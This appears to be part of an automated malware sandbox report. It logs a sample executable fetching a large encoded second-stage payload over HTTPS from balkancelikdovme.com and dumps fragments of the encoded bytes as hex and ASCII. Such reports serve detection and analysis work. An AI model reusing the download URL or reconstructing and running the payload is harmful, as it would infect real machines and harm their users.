                                                                                          2023-08-23 17:31:18 UTC2004INData Raw: 6a 30 38 76 49 72 66 50 4c 79 2f 2f 4c 79 38 76 58 7a 6e 50 4c 79 38 76 62 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 67 54 30 38 76 4a 59 42 2f 4c 79 41 50 4c 79 38 76 58 7a 42 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 6d 6e 30 38 76 4a 34 42 50 4c 79 41 66 4c 79 38 76 58 7a 50 76 4c 79 38 76 50 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 7a 63 6f 4f 7a 66 79 38 76 49 53 43 76 4c 79 38 2f 4c 79 38 76 58 7a 55 2f 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 79 63 6b 4e 79 54 79 38 76 4a 52 38 76 4c 79 39 50 4c 79 38 76 58 7a 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 79 55 32 4e 76 4c 79 38 76 4a 68 2b 2f 4c 79 2b 50 4c 79 38
                                                                                          Data Ascii: j08vIrfPLy//Ly8vXznPLy8vby8vLy8vLy8vLy8vLy8vLy8gT08vJYB/LyAPLy8vXzBvLy8vLy8vLy8vLy8vLy8vLy8vLy8mn08vJ4BPLyAfLy8vXzPvLy8vPy8vLy8vLy8vLy8vLyTzcoOzfy8vISCvLy8/Ly8vXzU/Ly8vLy8vLy8vLy8vLy8vLyTyckNyTy8vJR8vLy9PLy8vXz8vLy8vLy8vLy8vLy8vLy8vLyTyU2NvLy8vJh+/Ly+PLy8
                                                                                          2023-08-23 17:31:18 UTC2020INData Raw: 38 6d 38 69 49 69 4d 43 77 78 4b 6a 6f 33 4b 7a 55 69 4e 54 67 78 49 69 34 6f 50 43 49 6e 4e 7a 49 31 4e 6b 38 7a 4a 44 55 33 54 31 48 79 49 69 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6d 4e 76 49 75 4b 44 77 69 4a 7a 63 79 4e 53 49 76 4c 44 59 33 38 69 49 69 49 6a 70 58 56 53 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6b 4a 79 63 69 4c 69 67 38 49 69 63 33 4d 6a 58 79 49 69 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6d 4e 69 49 73 4d 53 77 33 38 69 49 69 49 6a 70 58 56 53 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 31 4b 44 41 79 4f 53 67 69 4c 69 67 38 49 69 63 33 4d 6a 58 79 49 69 49 77 4c 44 45 71 4f 69 49 58 62 52 59 6d 4a 43 38 76 4a 53 51 6d 4c 76 4a 6c 4c 79 39 6d 4d 54 63 31 50 42 4d 79 4c 44 45 33 38 69 49 69 49 68 55 59 62 78 64 71 62 6d 59 69 45 78 5a 6d 47
                                                                                          Data Ascii: 8m8iIiMCwxKjo3KzUiNTgxIi4oPCInNzI1Nk8zJDU3T1HyIiIwLDEqOjcrNSImNvIuKDwiJzcyNSIvLDY38iIiIjpXVSIwLDEqOjcrNSIkJyciLig8Iic3MjXyIiIwLDEqOjcrNSImNiIsMSw38iIiIjpXVSIwLDEqOjcrNSI1KDAyOSgiLig8Iic3MjXyIiIwLDEqOiIXbRYmJC8vJSQmLvJlLy9mMTc1PBMyLDE38iIiIhUYbxdqbmYiExZmG


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          2192.168.2.349737185.181.116.217443C:\Users\user\Desktop\0vJrK0NCd1.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          2023-08-23 17:31:32 UTC2024OUTGET /work/Elpuxpkilck HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                          Host: balkancelikdovme.com
                                                                                          2023-08-23 17:31:32 UTC2024INHTTP/1.1 200 OK
                                                                                          Connection: close
                                                                                          last-modified: Tue, 22 Aug 2023 08:42:22 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 1036168
                                                                                          date: Wed, 23 Aug 2023 17:31:32 GMT
                                                                                          vary: User-Agent
                                                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                          2023-08-23 17:31:32 UTC2025INData Raw: 53 30 6c 4b 52 6d 46 57 48 42 64 43 59 55 52 6f 49 69 49 58 59 55 52 46 52 69 46 48 53 30 6c 4b 49 69 4a 45 59 55 56 45 56 6c 68 46 52 45 4a 68 4c 43 67 6b 4a 44 45 39 4f 43 77 7a 4e 44 6b 6d 4f 79 6f 32 4a 44 4d 36 4a 7a 45 6c 50 44 73 76 4c 54 67 36 4f 53 6b 6b 4f 44 67 32 4a 43 34 77 4a 44 49 6f 4b 7a 4d 79 4b 79 77 6c 4c 44 59 6e 4f 44 6b 30 4e 69 30 72 4a 53 51 73 4a 6a 30 33 50 54 59 78 4e 79 67 6f 4f 7a 63 32 4e 43 30 6e 50 53 77 34 4c 54 63 73 4d 30 74 4a 53 6b 5a 68 56 68 77 58 51 6d 46 45 61 43 49 69 46 32 46 45 52 55 59 68 52 30 74 4a 53 69 49 69 52 47 46 46 52 46 5a 59 52 55 52 43 59 57 59 76 4d 7a 67 37 4d 79 34 73 4c 79 59 75 53 30 6c 4b 52 6d 46 57 48 42 64 43 59 55 52 6f 49 69 49 58 59 55 52 46 52 69 46 48 53 30 6c 4b 49 69 4a 45 59 55 56
                                                                                          Data Ascii: S0lKRmFWHBdCYURoIiIXYURFRiFHS0lKIiJEYUVEVlhFREJhLCgkJDE9OCwzNDkmOyo2JDM6JzElPDsvLTg6OSkkODg2JC4wJDIoKzMyKywlLDYnODk0Ni0rJSQsJj03PTYxNygoOzc2NC0nPSw4LTcsM0tJSkZhVhwXQmFEaCIiF2FERUYhR0tJSiIiRGFFRFZYRURCYWYvMzg7My4sLyYuS0lKRmFWHBdCYURoIiIXYURFRiFHS0lKIiJEYUV
                                                                                          2023-08-23 17:31:32 UTC2026INData Raw: 78 6c 4e 58 6a 6c 77 34 2b 68 4b 39 38 39 72 64 79 50 64 68 47 78 44 4e 75 57 53 7a 59 68 73 56 31 30 52 51 4c 68 72 42 75 42 5a 65 57 31 6e 49 4d 6d 4e 6a 75 2b 79 47 51 59 56 44 2f 51 30 4e 66 71 31 46 77 52 31 7a 45 4a 42 6a 74 78 56 69 53 48 55 69 32 51 46 79 62 47 41 62 7a 33 34 57 74 53 46 4c 41 33 38 55 57 53 35 61 77 6b 35 4b 4c 2f 70 2b 62 35 47 30 7a 68 73 55 75 74 65 4b 65 6b 32 7a 2f 56 50 71 79 62 39 63 4b 78 59 65 2f 39 55 63 38 43 4a 46 4b 46 37 49 54 59 66 45 50 75 4b 31 75 31 4a 52 50 2f 74 69 58 57 42 49 4c 6c 6f 55 52 49 41 47 77 58 55 4c 76 41 53 7a 64 57 72 76 78 6c 4b 34 2f 62 72 36 74 77 4e 32 46 45 73 57 53 77 6a 50 62 73 6f 70 2b 32 58 51 61 30 73 38 41 32 4e 44 55 38 6b 72 46 6d 76 44 78 59 42 31 53 50 72 2b 51 72 77 44 7a 65 76
                                                                                          Data Ascii: xlNXjlw4+hK989rdyPdhGxDNuWSzYhsV10RQLhrBuBZeW1nIMmNju+yGQYVD/Q0Nfq1FwR1zEJBjtxViSHUi2QFybGAbz34WtSFLA38UWS5awk5KL/p+b5G0zhsUuteKek2z/VPqyb9cKxYe/9Uc8CJFKF7ITYfEPuK1u1JRP/tiXWBILloURIAGwXULvASzdWrvxlK4/br6twN2FEsWSwjPbsop+2XQa0s8A2NDU8krFmvDxYB1SPr+QrwDzev
                                                                                          2023-08-23 17:31:32 UTC2040INData Raw: 5a 6b 4b 6e 41 32 45 48 45 4d 51 50 55 39 44 55 42 5a 50 6c 6b 2b 46 54 6b 57 4a 79 51 6b 63 54 30 37 4e 6a 41 30 4d 79 6c 66 4a 45 67 70 54 44 71 79 4b 72 38 6c 74 44 72 47 50 64 38 38 32 7a 33 6b 50 64 73 31 67 6b 42 35 4b 58 30 6d 69 43 69 6b 4c 71 4d 6a 72 43 61 6b 4f 70 59 30 71 43 34 59 50 47 77 6e 39 6a 67 50 4b 51 59 6a 2b 54 74 65 4e 56 73 35 55 79 5a 71 50 6d 4d 30 50 43 4e 42 4b 53 77 6c 4f 6a 78 57 4e 45 51 39 54 79 79 34 4c 4c 59 39 78 7a 54 41 4c 39 4d 71 33 45 48 57 4d 64 55 6b 6b 43 4f 43 4a 33 30 30 66 54 69 77 4d 5a 4a 41 61 79 67 43 4f 67 6b 32 4d 7a 68 61 4a 62 4d 2b 75 69 2f 68 50 4e 73 6a 65 43 61 4c 4e 35 49 6a 6d 7a 65 68 4f 78 59 39 42 45 44 2b 50 51 42 78 7a 30 46 52 4e 6c 34 78 78 79 37 6b 4d 2b 41 38 65 7a 36 66 4c 36 59 75 44
                                                                                          Data Ascii: ZkKnA2EHEMQPU9DUBZPlk+FTkWJyQkcT07NjA0MylfJEgpTDqyKr8ltDrGPd882z3kPds1gkB5KX0miCikLqMjrCakOpY0qC4YPGwn9jgPKQYj+TteNVs5UyZqPmM0PCNBKSwlOjxWNEQ9Tyy4LLY9xzTAL9Mq3EHWMdUkkCOCJ300fTiwMZJAaygCOgk2MzhaJbM+ui/hPNsjeCaLN5IjmzehOxY9BED+PQBxz0FRNl4xxy7kM+A8ez6fL6YuD
                                                                                          2023-08-23 17:31:32 UTC2056INData Raw: 62 47 75 73 6d 38 78 72 2f 47 7a 63 37 4f 78 62 61 36 78 72 2f 42 76 64 47 33 79 38 44 50 76 37 76 4c 78 4e 47 35 74 38 4c 4a 76 62 79 38 7a 64 47 36 75 38 44 52 79 4d 50 4f 77 38 72 48 76 38 50 48 78 74 48 4a 77 4d 75 36 75 72 37 41 79 63 6a 52 7a 73 62 50 75 62 71 35 76 38 57 36 79 73 32 33 75 73 44 42 79 63 71 35 79 62 72 43 75 38 6d 2f 52 4d 72 52 77 6d 6d 30 76 54 36 6f 54 37 6f 7a 6f 6b 69 2f 7a 53 71 39 7a 4d 56 4d 74 72 6a 44 54 72 71 37 76 44 4c 4f 76 62 63 6b 79 4d 64 45 61 73 76 4e 51 78 7a 4e 79 4d 5a 50 78 72 38 69 68 2b 48 42 77 4b 54 49 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 4a 76 35 75 36 7a 33 43 4d 76 39 47 2b 76 63 72 43 30 62 61 33 78 4d 6d 36 76
                                                                                          Data Ascii: bGusm8xr/Gzc7Oxba6xr/BvdG3y8DPv7vLxNG5t8LJvby8zdG6u8DRyMPOw8rHv8PHxtHJwMu6ur7AycjRzsbPubq5v8W6ys23usDBycq5ybrCu8m/RMrRwmm0vT6oT7ozoki/zSq9zMVMtrjDTrq7vDLOvbckyMdEasvNQxzNyMZPxr8ih+HBwKTI0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrJv5u6z3CMv9G+vcrC0ba3xMm6v
                                                                                          2023-08-23 17:31:32 UTC2072INData Raw: 37 45 30 59 65 2f 78 4d 53 47 30 63 61 37 69 37 71 39 76 59 44 4a 78 38 71 4f 78 74 43 79 65 37 6e 41 78 6e 76 4b 79 73 44 62 77 4c 34 58 7a 62 6e 47 74 65 6d 37 78 72 6a 6d 79 73 35 67 76 62 6d 36 79 63 43 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 38 61 2f 78 73 70 6e 7a 70 79 32 76 63 61 6d 77 62 72 51 72 73 75 2f 7a 71 61 37 7a 4d 57 59 75 62 6a 44 6f 4c 32 37 76 5a 54 52 76 62 71 70 30 63 66 43 6c 38 50 4e 78 36 62 44 79 4d 61 59 79 52 66 4c 6f 37 71 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 75 4c 74 73 31
                                                                                          Data Ascii: 7E0Ye/xMSG0ca7i7q9vYDJx8qOxtCye7nAxnvKysDbwL4XzbnGtem7xrjmys5gvbm6ycC+vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu8a/xspnzpy2vcamwbrQrsu/zqa7zMWYubjDoL27vZTRvbqp0cfCl8PNx6bDyMaYyRfLo7q+wMnH0c7G0Lm7ucDFu8rKuLts1
                                                                                          2023-08-23 17:31:32 UTC2088INData Raw: 62 4b 7a 73 37 46 75 62 72 47 76 37 36 39 30 4c 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6d 36 76 4c 33 4e 7a 72 71 36 77 4d 37 49 77 73 37 45 79 73 65 2f 78 4d 66 47 30 63 62 41 79 37 71 39 76 73 44 4a 78 39 48 4f 78 74 43 35 75 37 6e 41 78 62 76 4b 79 72 65 37 77 4c 37 4a 79 37 6e 47 75 73 6d 37 78 72 2f 47 79 73 37 4f 78 62 6d 36 78 72 2b 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 38 61 2f 78 73 72 4f 7a 73 57 35 75 73 61 2f 76 72 33 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 79 62 71 38 76 63 33 4f 75 72 72 41 7a
                                                                                          Data Ascii: bKzs7FubrGv7690LfMwM6/vMvF0ba3w8m6vL3Nzrq6wM7Iws7Eyse/xMfG0cbAy7q9vsDJx9HOxtC5u7nAxbvKyre7wL7Jy7nGusm7xr/Gys7Oxbm6xr++vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu8a/xsrOzsW5usa/vr3Qt8zAzr+8y8XRtrfDybq8vc3OurrAz
                                                                                          2023-08-23 17:31:32 UTC2104INData Raw: 62 52 78 73 44 4c 75 72 32 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 47 76 37 36 39 30 4c 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6d 36 76 4c 33 4e 7a 72 71 36 77 4d 37 49 77 73 37 45 79 73 65 2f 78 4d 66 47 30 63 62 41 79 37 71 39 76 73 44 4a 78 39 48 4f 78 74 43 35 75 37 6e 41 78 62 76 4b 79 72 65 37 77 4c 37 4a 79 37 6e 47 75 73 6d 37 78 72 2f 47 79 73 37 4f 78 62 6d 36 78 72 2b 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75
                                                                                          Data Ascii: bRxsDLur2+wMnH0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrGv7690LfMwM6/vMvF0ba3w8m6vL3Nzrq6wM7Iws7Eyse/xMfG0cbAy7q9vsDJx9HOxtC5u7nAxbvKyre7wL7Jy7nGusm7xr/Gys7Oxbm6xr++vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu
                                                                                          2023-08-23 17:31:32 UTC2120INData Raw: 45 4b 43 41 6a 39 2b 50 34 4a 45 55 6a 41 34 4d 55 4d 2b 52 45 48 2f 77 46 4d 2f 76 50 32 41 76 51 4c 2b 47 49 47 5a 63 66 4b 78 2f 5a 6e 41 76 4c 33 2f 51 73 65 42 41 67 47 2f 2f 74 53 43 67 35 69 44 51 73 52 55 4c 79 2f 75 38 6f 50 2b 41 58 33 47 77 54 31 39 51 42 51 78 56 76 47 41 76 76 2f 4a 46 70 6f 48 52 4e 71 47 45 57 39 30 42 48 35 41 6d 6f 4b 44 76 56 56 44 42 44 34 43 50 2f 2f 2b 78 62 4e 73 62 6f 45 42 66 73 48 2b 47 6a 36 44 67 63 43 5a 51 49 41 44 67 55 47 44 76 30 57 76 67 54 4a 58 67 37 34 42 78 2f 30 42 66 62 37 2b 2f 34 4e 59 62 65 70 77 4c 35 67 39 76 4a 66 2f 66 2f 36 47 66 6f 41 44 51 33 34 43 50 59 54 78 71 61 2b 43 50 55 43 4b 76 77 49 41 76 33 35 2b 50 6d 32 74 77 49 50 2f 2f 38 50 45 46 6e 2b 39 41 55 50 2b 76 64 6e 78 67 54 48 76
                                                                                          Data Ascii: EKCAj9+P4JEUjA4MUM+REH/wFM/vP2AvQL+GIGZcfKx/ZnAvL3/QseBAgG//tSCg5iDQsRULy/u8oP+AX3GwT19QBQxVvGAvv/JFpoHRNqGEW90BH5AmoKDvVVDBD4CP//+xbNsboEBfsH+Gj6DgcCZQIADgUGDv0WvgTJXg74Bx/0Bfb7+/4NYbepwL5g9vJf/f/6GfoADQ34CPYTxqa+CPUCKvwIAv35+Pm2twIP//8PEFn+9AUP+vdnxgTHv
                                                                                          2023-08-23 17:31:32 UTC2136INData Raw: 37 41 79 63 66 52 61 74 49 42 75 52 2f 6b 47 4d 55 66 33 2b 4b 33 48 2b 33 6d 79 63 75 35 78 62 72 4a 75 38 61 2f 78 73 72 4f 7a 6d 66 6b 63 73 59 61 55 35 6e 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 59 2b 2f 31 76 63 33 4f 48 72 72 41 7a 73 6a 46 30 63 50 4e 78 37 2f 45 78 38 62 52 78 72 72 4c 46 56 5a 68 77 4d 6e 48 30 63 35 69 33 41 69 37 46 65 31 70 75 32 37 66 72 37 73 65 36 79 4c 4c 75 63 62 42 79 62 76 47 76 38 62 4b 7a 73 37 46 46 65 38 50 76 78 6c 57 46 62 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6b 67 38 54 66 4e 7a 72 6f 65 77 4d 37 49 77 74 48 44 7a 63 69 2f 78 4d 66 47 30 63 62 41 79 72 6f 55 55 77 58 4a 78 39 48 4f 78 6d 7a 6c 43 72 6b 65 32 42 58 4b 62 75 49 70 77 4c 37 4a 30 62 6e 47 75 73 6d 37 78 72 2f 47 79 6d 72 62 4c
                                                                                          Data Ascii: 7AycfRatIBuR/kGMUf3+K3H+3mycu5xbrJu8a/xsrOzmfkcsYaU5nQt8zAzr+8y8XRtrfDY+/1vc3OHrrAzsjF0cPNx7/Ex8bRxrrLFVZhwMnH0c5i3Ai7Fe1pu27fr7se6yLLucbBybvGv8bKzs7FFe8PvxlWFbfMwM6/vMvF0ba3w8kg8TfNzroewM7IwtHDzci/xMfG0cbAyroUUwXJx9HOxmzlCrke2BXKbuIpwL7J0bnGusm7xr/GymrbL
                                                                                          2023-08-23 17:31:32 UTC2152INData Raw: 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 4f 6a 35 72 61 47 70 6b 4c 6a 56 41 5a 6d 39 78 4b 33 41 6d 4d 53 63 6f 63 54 4d 37 50 44 51 38 4c 79 73 6b 4a 7a 6f 66 62 54 59 78 4c 79 30 67 4e 54 51 61 4e 72 72 4a 75 38 61 2f 78 73 72 4f 7a 73 57 35 75 73 61 2f 76 72 33 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 79 62 71 38 76 63 33 4f 75 72 72 41 7a 73 6a 43 7a 73 54 4b 78 37 2f 45 78 38 62 52 78 73 44 4c 75 72 32 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 47 4b 69 73 74 63 53 51 7a 49 57 73 75 49 47 35 6b 4f 43 67 77 5a 54 38 68 4d 43 45 2b 63 53 34 75 4d 48 45 34 4e 6e 45 30 50 6a 6b 78 4e 44 6b 36 50 7a 6f 77 50
                                                                                          Data Ascii: DOv7zLxdG2t8PJury9zc66usDOOj5raGpkLjVAZm9xK3AmMScocTM7PDQ8LyskJzofbTYxLy0gNTQaNrrJu8a/xsrOzsW5usa/vr3Qt8zAzr+8y8XRtrfDybq8vc3OurrAzsjCzsTKx7/Ex8bRxsDLur2+wMnH0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrGKistcSQzIWsuIG5kOCgwZT8hMCE+cS4uMHE4NnE0PjkxNDk6PzowP
                                                                                          2023-08-23 17:31:32 UTC2168INData Raw: 62 2b 42 52 49 42 42 66 35 64 79 67 49 41 43 76 59 43 43 78 55 48 2b 67 52 4f 78 72 2f 47 79 76 67 4b 42 67 2f 31 41 45 76 37 2f 76 72 79 58 38 44 4f 76 37 7a 2b 42 76 76 2b 39 41 4e 6a 2f 2f 38 50 45 46 6d 36 48 74 35 51 79 47 54 6d 4f 73 70 6e 34 55 4c 48 61 4f 66 51 77 47 70 67 36 62 34 67 35 30 66 52 63 4f 4f 6d 75 62 75 35 43 63 57 37 79 73 71 33 48 4c 62 71 79 57 70 52 34 72 70 6c 79 41 2b 2f 61 4c 6d 66 7a 6d 48 4b 34 63 59 68 77 69 37 51 47 62 6c 64 7a 69 43 2f 42 4d 56 77 73 70 6e 44 5a 63 64 38 76 57 6e 52 69 72 6f 68 79 4d 4c 43 62 63 52 47 78 79 44 46 52 73 5a 77 78 4e 62 4c 47 37 2f 49 77 47 6a 52 56 73 35 6f 36 49 69 37 46 39 79 59 75 32 7a 75 6b 62 73 67 32 68 54 4c 46 2f 43 64 79 52 33 77 70 73 5a 73 36 49 66 46 46 39 36 54 76 79 4c 68 64
                                                                                          Data Ascii: b+BRIBBf5dygIACvYCCxUH+gROxr/GyvgKBg/1AEv7/vryX8DOv7z+Bvv+9ANj//8PEFm6Ht5QyGTmOspn4ULHaOfQwGpg6b4g50fRcOOmubu5CcW7ysq3HLbqyWpR4rplyA+/aLmfzmHK4cYhwi7QGbldziC/BMVwspnDZcd8vWnRirohyMLCbcRGxyDFRsZwxNbLG7/IwGjRVs5o6Ii7F9yYu2zukbsg2hTLF/CdyR3wpsZs6IfFF96TvyLhd
                                                                                          2023-08-23 17:31:32 UTC2184INData Raw: 6c 55 51 2b 4c 69 76 4c 33 4e 63 79 68 78 5a 71 43 36 5a 2b 2b 44 54 7a 72 63 43 63 66 47 30 58 73 58 55 4d 76 69 4b 31 35 45 69 45 72 2b 35 4e 53 35 75 37 6d 46 50 55 67 58 6f 75 73 38 45 34 46 43 6e 4e 4e 6a 75 73 6d 37 65 79 44 32 6a 6a 46 75 54 39 70 39 51 34 44 66 6c 64 43 33 7a 49 56 43 44 2f 6b 74 57 65 4d 37 65 45 69 32 32 37 69 39 7a 63 36 48 53 52 30 6c 4d 42 32 65 71 59 31 44 54 2b 51 49 78 74 48 47 68 57 6d 74 35 41 55 51 45 53 61 4f 54 42 6e 76 35 37 75 35 77 49 41 6e 48 54 63 4a 49 31 71 4b 68 6b 39 6c 36 54 66 4a 75 38 61 43 62 64 4b 54 32 72 64 32 74 59 6c 62 6b 64 73 54 74 38 7a 41 63 79 4c 78 64 62 4b 78 5a 73 53 45 45 75 33 61 56 38 33 4f 75 6f 63 31 6a 50 63 61 32 7a 4c 62 69 46 76 44 32 67 2f 52 78 73 42 32 4a 45 6b 32 6d 35 65 55 75
                                                                                          Data Ascii: lUQ+LivL3NcyhxZqC6Z++DTzrcCcfG0XsXUMviK15EiEr+5NS5u7mFPUgXous8E4FCnNNjusm7eyD2jjFuT9p9Q4DfldC3zIVCD/ktWeM7eEi227i9zc6HSR0lMB2eqY1DT+QIxtHGhWmt5AUQESaOTBnv57u5wIAnHTcJI1qKhk9l6TfJu8aCbdKT2rd2tYlbkdsTt8zAcyLxdbKxZsSEEu3aV83Ouoc1jPca2zLbiFvD2g/RxsB2JEk2m5eUu
                                                                                          2023-08-23 17:31:32 UTC2200INData Raw: 76 75 68 37 76 41 76 73 6e 4c 47 4f 4c 55 79 62 76 47 76 38 5a 72 36 75 6a 46 75 62 72 47 76 79 48 67 58 62 66 4d 77 4d 36 2f 47 2b 35 53 30 62 61 33 77 38 6b 64 34 52 4c 4e 7a 72 71 36 77 47 2f 6c 58 4d 37 45 79 73 65 2f 59 65 4b 59 30 63 62 41 79 37 6f 63 32 36 37 4a 78 39 48 4f 78 6d 33 55 65 62 6e 41 78 62 76 4b 61 39 4a 35 77 4c 37 4a 79 37 6c 6e 31 4d 2b 37 78 72 2f 47 79 6d 2f 6f 79 37 6d 36 78 72 2b 2b 48 4f 59 58 7a 4d 44 4f 76 37 78 73 36 32 2b 32 74 38 50 4a 75 68 76 54 49 4d 36 36 75 73 44 4f 5a 65 77 64 78 4d 72 48 76 38 52 6f 38 49 76 47 77 4d 75 36 76 53 48 57 67 38 66 52 7a 73 62 51 47 4e 53 7a 77 4d 57 37 79 73 6f 61 31 4c 71 2b 79 63 75 35 78 68 33 75 48 38 61 2f 78 73 72 4f 62 2b 6f 56 75 73 61 2f 76 72 31 74 34 42 66 41 7a 72 2b 38 79
                                                                                          Data Ascii: vuh7vAvsnLGOLUybvGv8Zr6ujFubrGvyHgXbfMwM6/G+5S0ba3w8kd4RLNzrq6wG/lXM7Eyse/YeKY0cbAy7oc267Jx9HOxm3UebnAxbvKa9J5wL7Jy7ln1M+7xr/Gym/oy7m6xr++HOYXzMDOv7xs62+2t8PJuhvTIM66usDOZewdxMrHv8Ro8IvGwMu6vSHWg8fRzsbQGNSzwMW7ysoa1Lq+ycu5xh3uH8a/xsrOb+oVusa/vr1t4BfAzr+8y
                                                                                          2023-08-23 17:31:32 UTC2216INData Raw: 7a 37 75 72 72 41 7a 6b 58 6b 4c 6e 49 49 6d 58 63 73 5a 59 4d 39 6c 6f 63 38 66 2f 71 6b 4c 76 59 43 48 41 69 56 46 75 72 37 58 78 6b 43 32 50 57 68 77 64 59 38 68 68 38 32 76 2f 7a 64 4c 48 57 4d 36 4f 6e 37 76 7a 45 4a 62 2f 41 39 6e 59 5a 64 38 77 5a 61 56 43 5a 41 58 38 67 4c 65 48 54 55 4b 4a 38 51 2f 66 43 57 6d 6b 43 2b 68 43 6a 30 33 75 7a 32 67 4a 72 64 70 36 67 73 62 74 31 5a 44 79 6e 74 75 2b 47 4a 31 64 44 45 53 2f 69 4a 45 62 6e 41 78 62 55 42 63 39 5a 4a 39 77 6e 55 50 38 7a 2b 44 67 74 62 77 38 43 36 55 4e 43 52 36 46 52 6f 77 6c 41 67 4c 7a 39 4e 70 4b 36 4e 52 32 73 38 36 31 71 6f 63 74 2f 44 65 4b 6d 30 5a 74 49 56 69 39 4f 45 66 38 79 43 4c 34 37 44 68 45 79 41 4a 64 75 72 4e 30 39 78 5a 2f 41 65 33 4d 6b 70 7a 4e 72 65 37 7a 4e 4a 48
                                                                                          Data Ascii: z7urrAzkXkLnIImXcsZYM9loc8f/qkLvYCHAiVFur7XxkC2PWhwdY8hh82v/zdLHWM6On7vzEJb/A9nYZd8wZaVCZAX8gLeHTUKJ8Q/fCWmkC+hCj03uz2gJrdp6gsbt1ZDyntu+GJ1dDES/iJEbnAxbUBc9ZJ9wnUP8z+Dgtbw8C6UNCR6FRowlAgLz9NpK6NR2s861qoct/DeKm0ZtIVi9OEf8yCL47DhEyAJdurN09xZ/Ae3MkpzNre7zNJH
                                                                                          2023-08-23 17:31:32 UTC2232INData Raw: 73 55 78 6a 66 4a 41 73 62 30 78 73 72 4f 7a 73 55 44 75 76 4b 2f 76 72 33 51 74 2f 54 41 2f 62 2b 38 79 38 58 52 39 62 66 35 79 62 71 38 2f 4d 31 70 63 6a 72 41 7a 73 68 6d 7a 6d 65 43 56 72 2f 45 78 36 7a 52 59 58 68 4f 75 72 32 2b 69 73 6c 69 69 63 62 47 30 4c 6d 61 75 52 32 4b 78 38 72 4b 74 36 76 41 47 34 36 37 75 63 61 36 34 37 74 68 65 4f 62 4b 7a 73 37 47 75 52 2b 52 37 37 36 39 30 50 66 4d 48 59 6c 37 76 4d 76 46 38 37 59 55 6a 49 47 36 76 4c 30 6b 7a 68 2b 46 75 4d 37 49 77 67 4c 45 62 5a 43 66 78 4d 66 47 72 38 59 64 68 47 47 39 76 73 41 7a 78 32 78 35 42 39 43 35 75 77 6a 41 61 48 51 48 79 72 65 37 54 62 35 6b 64 58 6e 47 75 73 6b 51 78 68 79 52 43 38 37 4f 78 55 69 36 59 59 6e 75 76 64 43 33 43 63 42 70 65 42 48 4c 78 64 45 6a 74 32 5a 2b 38
